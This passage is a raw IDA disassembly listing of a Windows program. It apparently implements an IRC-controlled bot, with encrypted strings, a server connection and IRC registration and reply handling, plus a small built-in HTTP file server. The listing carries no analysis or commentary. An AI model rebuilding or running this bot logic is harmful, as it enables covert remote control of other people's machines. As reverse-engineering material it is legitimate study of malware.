mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417B17
test dl, dl
jz short loc_417B13
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417B17
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417AF9
loc_417B13: ; CODE XREF: sub_41783D+2C4�j
xor eax, eax
jmp short loc_417B1C
; ---------------------------------------------------------------------------
loc_417B17: ; CODE XREF: sub_41783D+2C0�j
; sub_41783D+2CC�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417B1C: ; CODE XREF: sub_41783D+2D8�j
test eax, eax
jnz loc_417EEE
push 9
lea esi, [ebp+var_14]
mov ebx, offset word_42555E
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
mov eax, esi
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
push offset aSSS_2 ; "%s %s %s\r\n"
call sub_4172CC
add esp, 10h
loc_417B68: ; CODE XREF: sub_41783D+3E0�j
test al, al
jnz loc_417EEE
jmp loc_417A98
; ---------------------------------------------------------------------------
loc_417B75: ; CODE XREF: sub_41783D+298�j
push 4
mov edi, offset a001 ; "001"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417C22
push 9
lea esi, [ebp+var_14]
mov ebx, offset word_42555E
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_44]
mov ebx, offset byte_425567
call sub_4196D1
lea esi, [ebp+var_32C]
mov ebx, offset dword_424ED0
mov [esp+10h+var_10], 100h
call sub_4196D1
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset dword_424FD0
call sub_4196D1
pop ecx
push 80h
lea esi, [ebp+var_22C]
mov ebx, offset byte_424FE9
call sub_4196D1
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, esi
push eax
lea eax, [edi+5]
push eax
lea eax, [ebp+var_44]
push eax
push offset aSSSSSS ; "%s %s %s\r\n%s %s %s\r\n"
call sub_4172CC
add esp, 1Ch
jmp loc_417B68
; ---------------------------------------------------------------------------
loc_417C22: ; CODE XREF: sub_41783D+34A�j
lea ecx, [ebp+var_54]
lea eax, [ebp+var_1062C]
loc_417C2B: ; CODE XREF: sub_41783D+406�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417C49
test dl, dl
jz short loc_417C45
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417C49
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417C2B
loc_417C45: ; CODE XREF: sub_41783D+3F6�j
xor eax, eax
jmp short loc_417C4E
; ---------------------------------------------------------------------------
loc_417C49: ; CODE XREF: sub_41783D+3F2�j
; sub_41783D+3FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417C4E: ; CODE XREF: sub_41783D+40A�j
test eax, eax
jz short loc_417C6A
push 4
mov edi, offset a332 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_417EEE
loc_417C6A: ; CODE XREF: sub_41783D+413�j
push 8
pop ecx
xor eax, eax
mov [ebp+var_78], 0
lea edi, [ebp+var_77]
rep stosd
mov ebx, 0FFh
push ebx
stosw
xor esi, esi
lea eax, [ebp+var_1AB]
push esi
push eax
mov byte ptr [ebp+var_10730], 0
mov [ebp+var_1AC], 0
call sub_407B70
add esp, 0Ch
push ebx
lea eax, [ebp+var_62B]
push esi
push eax
mov [ebp+var_62C], 0
call sub_407B70
add esp, 0Ch
push ebx
lea eax, [ebp+var_72B]
push esi
push eax
mov [ebp+var_72C], 0
call sub_407B70
add esp, 0Ch
lea eax, [ebp+var_1072C]
push offset asc_42029C ; " :"
push eax
call sub_403A34
push eax
push offset aS_0 ; "%s"
lea eax, [ebp+var_62C]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_62C]
add esp, 18h
lea esi, [eax+1]
loc_417D00: ; CODE XREF: sub_41783D+4C8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D00
sub eax, esi
mov [ebp+eax+var_62C], cl
lea eax, [ebp+var_1072C]
push offset asc_4202A4 ; "!"
push eax
call sub_403A34
push eax
push offset aS_1 ; "%s"
lea eax, [ebp+var_78]
push 22h
push eax
call sub_402AEE
lea eax, [ebp+var_78]
add esp, 18h
lea esi, [eax+1]
loc_417D3B: ; CODE XREF: sub_41783D+503�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D3B
sub eax, esi
mov [ebp+eax+var_78], cl
lea eax, [ebp+var_78]
lea esi, [eax+1]
loc_417D4E: ; CODE XREF: sub_41783D+516�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D4E
sub eax, esi
push eax
lea eax, [ebp+var_77]
push eax
lea eax, [ebp+var_78]
push eax
call sub_403910
add esp, 0Ch
push 4
mov edi, offset a332_0 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_417DB4
lea eax, [ebp+var_1042C]
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417DA1: ; CODE XREF: sub_41783D+569�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417DA1
mov byte ptr [ebp+var_10730], 1
jmp loc_417E41
; ---------------------------------------------------------------------------
loc_417DB4: ; CODE XREF: sub_41783D+53D�j
mov esi, [ebp+var_10734]
add esi, 5
lea eax, [ebp+var_1052C]
loc_417DC3: ; CODE XREF: sub_41783D+59E�j
mov cl, [eax]
cmp cl, [esi]
jnz short loc_417DE1
test cl, cl
jz short loc_417DDD
mov cl, [eax+1]
cmp cl, [esi+1]
jnz short loc_417DE1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_417DC3
loc_417DDD: ; CODE XREF: sub_41783D+58E�j
xor eax, eax
jmp short loc_417DE6
; ---------------------------------------------------------------------------
loc_417DE1: ; CODE XREF: sub_41783D+58A�j
; sub_41783D+596�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417DE6: ; CODE XREF: sub_41783D+5A2�j
test eax, eax
jnz short loc_417E15
lea eax, [ebp+var_78]
push eax
push offset aS_3 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E0C: ; CODE XREF: sub_41783D+5D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E0C
jmp short loc_417E41
; ---------------------------------------------------------------------------
loc_417E15: ; CODE XREF: sub_41783D+5AB�j
lea eax, [ebp+var_1052C]
push eax
push offset aS_4 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402AEE
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_417E3A: ; CODE XREF: sub_41783D+602�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E3A
loc_417E41: ; CODE XREF: sub_41783D+572�j
; sub_41783D+5D6�j
sub eax, edx
push 100h
lea esi, [ebp+var_72C]
mov ebx, offset byte_425021
mov [ebp+eax+var_1AC], 0
call sub_4196D1
pop ecx
lea eax, [ebp+var_62C]
mov ecx, esi
call sub_419044
test eax, eax
jnz short loc_417E7A
cmp byte ptr [ebp+var_10730], al
jz short loc_417EEE
loc_417E7A: ; CODE XREF: sub_41783D+633�j
xor edi, edi
cmp byte ptr [ebp+var_10730], 0
lea eax, [ebp+var_52C]
jz short loc_417E92
push offset asc_4202BC ; ";"
jmp short loc_417E97
; ---------------------------------------------------------------------------
loc_417E92: ; CODE XREF: sub_41783D+64C�j
push offset asc_4202C0 ; ";"
loc_417E97: ; CODE XREF: sub_41783D+653�j
push eax
call sub_403A34
jmp short loc_417EB3
; ---------------------------------------------------------------------------
loc_417E9F: ; CODE XREF: sub_41783D+67A�j
push offset asc_4202C4 ; ";"
push 0
mov [ebp+edi*4+var_10F34], eax
call sub_403A34
inc edi
loc_417EB3: ; CODE XREF: sub_41783D+660�j
test eax, eax
pop ecx
pop ecx
jnz short loc_417E9F
xor esi, esi
test edi, edi
jle short loc_417EEE
loc_417EBF: ; CODE XREF: sub_41783D+6AF�j
push [ebp+esi*4+var_10F34]
lea eax, [ebp+var_1AC]
push eax
lea eax, [ebp+var_62C]
push eax
lea eax, [ebp+var_78]
push eax
push [ebp+var_10730]
push [ebp+var_10734]
call sub_417676
inc esi
cmp esi, edi
jl short loc_417EBF
loc_417EEE: ; CODE XREF: sub_41783D+2E1�j
; sub_41783D+32D�j ...
mov al, 1
loc_417EF0: ; CODE XREF: sub_41783D+25D�j
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41783D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F01 proc near ; CODE XREF: J8@F_7_S:0041C039�p
var_20414 = dword ptr -20414h
var_20410 = dword ptr -20410h
var_2040C = dword ptr -2040Ch
var_20408 = byte ptr -20408h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 20414h
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_407]
mov edi, ecx
push ebx
push eax
mov [ebp+var_20414], edi
mov [ebp+var_408], bl
call sub_407B70
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+var_408]
push eax
push dword ptr [edi]
mov [ebp+var_2040C], ebx
call ds:dword_41D270
test eax, eax
jz loc_418016
lea eax, [ebp+var_408]
lea edx, [eax+1]
loc_417F69: ; CODE XREF: sub_417F01+6D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_417F69
sub eax, edx
mov [ebp+eax+var_408], bl
lea eax, [ebp+var_408]
push offset asc_420238 ; "\r\n"
push eax
call sub_403A34
push 20000h
mov edi, eax
lea eax, [ebp+var_20408]
push ebx
push eax
call sub_407B70
add esp, 14h
cmp edi, ebx
mov esi, 200h
jz short loc_417FEC
lea eax, [ebp+var_20408]
mov [ebp+var_20410], eax
loc_417FB6: ; CODE XREF: sub_417F01+E9�j
push edi
push offset aS_10 ; "%s"
push 1FFh
push [ebp+var_20410]
call sub_402AEE
push offset asc_420240 ; "\r\n"
push ebx
call sub_403A34
add [ebp+var_20410], esi
add esp, 18h
inc [ebp+var_2040C]
mov edi, eax
cmp edi, ebx
jnz short loc_417FB6
loc_417FEC: ; CODE XREF: sub_417F01+A7�j
cmp [ebp+var_2040C], ebx
jle short loc_418012
mov ebx, [ebp+var_2040C]
lea edi, [ebp+var_20408]
loc_418000: ; CODE XREF: sub_417F01+10F�j
push [ebp+var_20414]
mov ecx, edi
call sub_41783D
add edi, esi
dec ebx
jnz short loc_418000
loc_418012: ; CODE XREF: sub_417F01+F1�j
mov al, 1
jmp short loc_418020
; ---------------------------------------------------------------------------
loc_418016: ; CODE XREF: sub_417F01+59�j
push dword ptr [edi]
call ds:dword_41D224
xor al, al
loc_418020: ; CODE XREF: sub_417F01+113�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417F01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41802F proc near ; CODE XREF: J8@F_7_S:0041C027�p
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = byte ptr -444h
var_443 = byte ptr -443h
var_440 = word ptr -440h
var_43E = word ptr -43Eh
var_43C = byte ptr -43Ch
var_430 = byte ptr -430h
var_42F = byte ptr -42Fh
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 454h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 0
push 1
mov edi, ecx
push 2
mov [ebp+var_450], edi
mov ebx, edx
mov [ebp+var_44C], eax
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov [edi], eax
jnz short loc_418079
push eax
loc_41806C: ; CODE XREF: sub_41802F+8B�j
call ds:dword_41D224
xor al, al
jmp loc_41828B
; ---------------------------------------------------------------------------
loc_418079: ; CODE XREF: sub_41802F+3A�j
push 1FFh
lea eax, [ebp+var_22F]
push 0
push eax
mov [ebp+var_230], 0
call sub_407B70
add esp, 0Ch
push 200h
lea esi, [ebp+var_230]
call sub_4196D1
pop ecx
mov eax, esi
push eax
call ds:dword_41D23C
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jnz short loc_4180BC
loc_4180B8: ; CODE XREF: sub_41802F+E7�j
push dword ptr [edi]
jmp short loc_41806C
; ---------------------------------------------------------------------------
loc_4180BC: ; CODE XREF: sub_41802F+87�j
push 200h
lea eax, [ebp+var_230]
push ebx
push eax
call sub_407B70
movsx eax, word ptr [esi+0Ah]
add esp, 0Ch
push eax
mov eax, [esi+0Ch]
push dword ptr [eax]
lea eax, [ebp+var_43C]
push eax
call sub_407BF0
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_440], 2
call ds:dword_41D278
mov [ebp+var_43E], ax
push 10h
lea eax, [ebp+var_440]
push eax
push dword ptr [edi]
call ds:dword_41D240
test eax, eax
jnz short loc_4180B8
mov eax, [ebp+var_44C]
lea edx, [eax+1]
loc_418121: ; CODE XREF: sub_41802F+F7�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418121
sub eax, edx
jz short loc_418197
xor eax, eax
mov [ebp+var_18], bl
lea edi, [ebp+var_17]
stosd
push 1FFh
stosd
lea eax, [ebp+var_42F]
push ebx
push eax
mov [ebp+var_430], bl
call sub_407B70
mov ebx, [ebp+var_44C]
add esp, 0Ch
push 200h
lea esi, [ebp+var_430]
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_18]
mov ebx, offset byte_425531
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea eax, [ebp+var_430]
push eax
mov eax, esi
push eax
push offset aSS_7 ; "%s %s\r\n"
call sub_4172CC
add esp, 0Ch
xor ebx, ebx
loc_418197: ; CODE XREF: sub_41802F+FB�j
xor eax, eax
mov [ebp+var_24], bl
lea edi, [ebp+var_23]
stosd
stosd
xor eax, eax
mov [ebp+var_30], bl
lea edi, [ebp+var_2F]
stosd
stosd
xor eax, eax
mov [ebp+var_C], bl
lea edi, [ebp+var_B]
stosd
stosw
xor eax, eax
push ebx
mov [ebp+var_448], bl
lea edi, [ebp+var_447]
stosw
push 3
mov [ebp+var_444], bl
lea edi, [ebp+var_443]
pop ecx
lea esi, [ebp+var_448]
stosw
call sub_418E51
pop ecx
push ebx
push 3
lea esi, [ebp+var_444]
call sub_418E1F
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosw
stosb
mov eax, esi
push eax
lea eax, [ebp+var_448]
push eax
push offset aSS_8 ; "%s-%s"
lea eax, [ebp+var_C]
push 6
push eax
call sub_402AEE
lea eax, [ebp+var_C]
add esp, 1Ch
lea esi, [eax+1]
loc_41821E: ; CODE XREF: sub_41802F+1F4�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41821E
sub eax, esi
mov [ebp+eax+var_C], bl
xor eax, eax
lea edi, [ebp+var_448]
stosw
stosb
xor eax, eax
lea edi, [ebp+var_444]
stosw
push 9
lea esi, [ebp+var_24]
mov ebx, offset dword_425528
stosb
call sub_4196D1
pop ecx
push 9
lea esi, [ebp+var_30]
mov ebx, offset word_42553A
call sub_4196D1
mov edi, [ebp+var_450]
pop ecx
lea ebx, [edi+5]
call sub_41748B
push ebx
lea eax, [ebp+var_C]
push eax
mov eax, esi
push eax
push ebx
lea eax, [ebp+var_24]
push eax
push offset aSSSS00S ; "%s %s\r\n%s %s 0 0 :%s\r\n"
call sub_4172CC
add esp, 18h
mov al, 1
loc_41828B: ; CODE XREF: sub_41802F+45�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 8
sub_41802F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41829C proc near ; CODE XREF: sub_418301+3E�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_10], eax
xor eax, eax
mov [ebp+var_C], 0
lea edi, [ebp+var_B]
push 5
lea esi, [ebp+var_C]
mov ebx, offset dword_425528
stosd
call sub_4196D1
mov ebx, [ebp+var_10]
pop ecx
add ebx, 5
call sub_41748B
push ebx
mov eax, esi
push eax
push offset aSS_6 ; "%s %s\r\n"
mov edi, offset dword_4269BC
call sub_4172CC
mov ecx, [ebp+var_4]
add esp, 0Ch
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 4
sub_41829C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_418301 proc near ; DATA XREF: J8@F_7_S:0041BF7C�o
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
push esi
push edi
call sub_418DA0
mov edi, ds:dword_426598
mov esi, ds:dword_42659C
loc_41831A: ; CODE XREF: sub_418301+5A�j
call sub_418DA0
cmp ds:dword_42659C, esi
jl short loc_418344
jg short loc_418331
cmp ds:dword_426598, edi
jbe short loc_418344
loc_418331: ; CODE XREF: sub_418301+26�j
cmp ds:byte_4269C0, 0
jz short loc_418344
push offset dword_4269BC
call sub_41829C
loc_418344: ; CODE XREF: sub_418301+24�j
; sub_418301+2E�j ...
mov edi, ds:dword_426598
mov esi, ds:dword_42659C
push 0C350h
call ds:dword_41D0FC
jmp short loc_41831A
sub_418301 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41835D proc near ; CODE XREF: sub_418AEB+1E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push offset word_426694
push ds:dword_4267AC
mov [ebp+var_4], 10h
call ds:dword_41D234
leave
retn
sub_41835D endp
; =============== S U B R O U T I N E =======================================
sub_41837F proc near ; CODE XREF: sub_418552+1D2�p
arg_0 = dword ptr 4
jmp short loc_418384
; ---------------------------------------------------------------------------
loc_418381: ; CODE XREF: sub_41837F+14�j
mov byte ptr [eax], 5Ch
loc_418384: ; CODE XREF: sub_41837F�j
push 2Fh
push [esp+4+arg_0]
call sub_403850
test eax, eax
pop ecx
pop ecx
jnz short loc_418381
retn
sub_41837F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418396 proc near ; CODE XREF: sub_418552+192�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_2 = byte ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
mov eax, esi
push edi
lea ecx, [eax+1]
loc_4183A7: ; CODE XREF: sub_418396+16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4183A7
sub eax, ecx
inc eax
push eax
call sub_402648
mov ebx, eax
push ebx
call sub_402A45
push eax
push 0
push ebx
call sub_407B70
push 25h
push esi
call sub_403850
add esp, 1Ch
test eax, eax
jnz short loc_418420
loc_4183D7: ; CODE XREF: sub_418396+114�j
mov eax, esi
mov edx, esi
loc_4183DB: ; CODE XREF: sub_418396+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4183DB
mov edi, ebx
sub eax, edx
dec edi
loc_4183E7: ; CODE XREF: sub_418396+57�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4183E7
mov ecx, eax
shr ecx, 2
mov esi, edx
mov edx, [ebp+arg_0]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, edx
stosd
mov eax, ebx
sub edx, ebx
loc_41840B: ; CODE XREF: sub_418396+7D�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_41840B
xor esi, esi
inc esi
jmp loc_4184B1
; ---------------------------------------------------------------------------
loc_41841D: ; CODE XREF: sub_418396+10E�j
mov eax, [ebp+var_8]
loc_418420: ; CODE XREF: sub_418396+3F�j
mov byte ptr [eax], 0
mov ecx, esi
loc_418425: ; CODE XREF: sub_418396+94�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_418425
sub ecx, esi
mov edi, ebx
mov edx, ecx
dec edi
loc_418433: ; CODE XREF: sub_418396+A3�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_418433
mov ecx, edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
inc eax
push 2
push eax
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
rep movsb
call sub_403910
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push offset asc_4204B4 ; "%x"
push eax
mov [ebp+var_2], 0
call sub_4035E4
add esp, 18h
test eax, eax
jz short loc_4184AF
mov eax, ebx
lea esi, [eax+1]
loc_41847B: ; CODE XREF: sub_418396+EA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41847B
mov cl, [ebp+var_C]
sub eax, esi
mov esi, [ebp+var_8]
add esi, 2
push 25h
push esi
mov [eax+ebx], cl
mov byte ptr [eax+ebx+1], 0
call sub_403850
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jnz loc_41841D
jmp loc_4183D7
; ---------------------------------------------------------------------------
loc_4184AF: ; CODE XREF: sub_418396+DE�j
xor esi, esi
loc_4184B1: ; CODE XREF: sub_418396+82�j
push ebx
call sub_402B9B
pop ecx
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_418396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4184BF proc near ; CODE XREF: sub_418552+A1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov [eax], esi
mov eax, [ebp+arg_4]
push edi
mov [eax], esi
mov eax, [ebp+arg_8]
push offset asc_42049C ; "\r\n"
push esi
mov [ebx], esi
mov [eax], esi
call sub_4037B0
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_4184EB
loc_4184E7: ; CODE XREF: sub_4184BF+52�j
; sub_4184BF+69�j ...
xor eax, eax
jmp short loc_41854F
; ---------------------------------------------------------------------------
loc_4184EB: ; CODE XREF: sub_4184BF+26�j
push offset asc_4204A0 ; " "
push esi
mov byte ptr [edi], 0
call sub_403A34
mov ecx, [ebp+arg_0]
push offset asc_4204A4 ; " "
push 0
mov [ecx], eax
call sub_403A34
add esp, 10h
test eax, eax
mov [ebx], eax
jz short loc_4184E7
push offset asc_4204A8 ; " "
push 0
call sub_403A34
test eax, eax
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jz short loc_4184E7
mov ecx, [ebp+arg_8]
lea eax, [edi+2]
cmp byte ptr [eax], 0
mov [ecx], eax
jz short loc_41854C
push offset asc_4204AC ; "\r\n\r\n"
push eax
call sub_4037B0
test eax, eax
pop ecx
pop ecx
jz short loc_4184E7
mov byte ptr [eax+2], 0
loc_41854C: ; CODE XREF: sub_4184BF+76�j
xor eax, eax
inc eax
loc_41854F: ; CODE XREF: sub_4184BF+2A�j
pop edi
pop ebp
retn
sub_4184BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CA8h
sub_418552 proc near ; CODE XREF: sub_418AEB+28�p
var_D28 = dword ptr -0D28h
var_D24 = dword ptr -0D24h
var_D20 = dword ptr -0D20h
var_D1C = dword ptr -0D1Ch
var_D18 = byte ptr -0D18h
var_D14 = byte ptr -0D14h
var_D13 = byte ptr -0D13h
var_D12 = byte ptr -0D12h
var_D11 = byte ptr -0D11h
var_D08 = byte ptr -0D08h
var_D07 = byte ptr -0D07h
var_908 = byte ptr -908h
var_907 = byte ptr -907h
var_508 = byte ptr -508h
var_507 = byte ptr -507h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-0CA8h]
sub esp, 0D28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+0CA8h+var_4], eax
push ebx
push esi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+0CA8h+var_907]
push ebx
push eax
mov [ebp+0CA8h+var_908], bl
call sub_407B70
push esi
lea eax, [ebp+0CA8h+var_507]
push ebx
push eax
mov [ebp+0CA8h+var_508], bl
call sub_407B70
push 103h
lea eax, [ebp+0CA8h+var_107]
push ebx
push eax
mov [ebp+0CA8h+var_108], bl
call sub_407B70
push esi
lea eax, [ebp+0CA8h+var_D07]
push ebx
push eax
mov [ebp+0CA8h+var_D08], bl
call sub_407B70
add esp, 30h
push ebx
push 400h
lea eax, [ebp+0CA8h+var_D08]
push eax
push [ebp+0CA8h+arg_0]
call ds:dword_41D270
mov [ebp+eax+0CA8h+var_D08], bl
lea eax, [ebp+0CA8h+var_D1C]
push eax
lea eax, [ebp+0CA8h+var_D20]
push eax
lea eax, [ebp+0CA8h+var_D28]
push eax
lea ebx, [ebp+0CA8h+var_D24]
lea esi, [ebp+0CA8h+var_D08]
call sub_4184BF
add esp, 0Ch
test eax, eax
jz loc_418AD4
mov esi, [ebp+0CA8h+var_D28]
push edi
push 4
mov edi, offset aGet ; "GET"
pop ecx
xor eax, eax
repe cmpsb
jz loc_4186E0
push offset aQue?_1 ; "Que?"
mov esi, 3FFh
lea eax, [ebp+0CA8h+var_908]
push esi
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_908]
add esp, 0Ch
lea edx, [eax+1]
loc_41863C: ; CODE XREF: sub_418552+EF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41863C
sub eax, edx
xor ebx, ebx
mov [ebp+eax+0CA8h+var_908], bl
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_418657: ; CODE XREF: sub_418552+10A�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418657
sub eax, ecx
push eax
push offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
lea eax, [ebp+0CA8h+var_508]
push esi
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_508]
add esp, 10h
lea ecx, [eax+1]
loc_41867F: ; CODE XREF: sub_418552+132�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41867F
sub eax, ecx
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea ecx, [eax+1]
loc_418698: ; CODE XREF: sub_418552+14B�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_418698
mov esi, ds:dword_41D228
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi
lea eax, [ebp+0CA8h+var_908]
lea ecx, [eax+1]
loc_4186C1: ; CODE XREF: sub_418552+174�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4186C1
push ebx
sub eax, ecx
push eax
lea eax, [ebp+0CA8h+var_908]
push eax
push [ebp+0CA8h+arg_0]
call esi
jmp loc_418AC7
; ---------------------------------------------------------------------------
loc_4186E0: ; CODE XREF: sub_418552+C1�j
mov edi, [ebp+0CA8h+var_D24]
push edi
call sub_418396
test eax, eax
pop ecx
jz loc_418AD3
mov eax, edi
lea edx, [eax+1]
loc_4186F7: ; CODE XREF: sub_418552+1AA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4186F7
sub eax, edx
cmp eax, 1
jbe loc_418849
inc edi
push 2Fh
push edi
call sub_403850
mov esi, eax
xor ebx, ebx
cmp esi, ebx
pop ecx
pop ecx
jz loc_4187A6
mov [esi], bl
inc esi
push esi
call sub_41837F
push ebx
push esi
call sub_403850
add esp, 0Ch
cmp [esi], bl
jz short loc_41876F
cmp byte ptr [eax-1], 5Ch
jz short loc_41876F
push esi
push edi
push offset dword_4266A8
push offset aSSS ; "%s\\%s\\%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 18h
lea esi, [eax+1]
loc_418766: ; CODE XREF: sub_418552+219�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418766
jmp short loc_4187D5
; ---------------------------------------------------------------------------
loc_41876F: ; CODE XREF: sub_418552+1E3�j
; sub_418552+1E9�j
push offset dword_4268B8
push esi
push edi
push offset dword_4266A8
push offset aSSSS ; "%s\\%s\\%s%s"
lea eax, [ebp+0CA8h+var_108]
push 103h
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_108]
add esp, 1Ch
lea esi, [eax+1]
loc_41879D: ; CODE XREF: sub_418552+250�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41879D
jmp short loc_4187D5
; ---------------------------------------------------------------------------
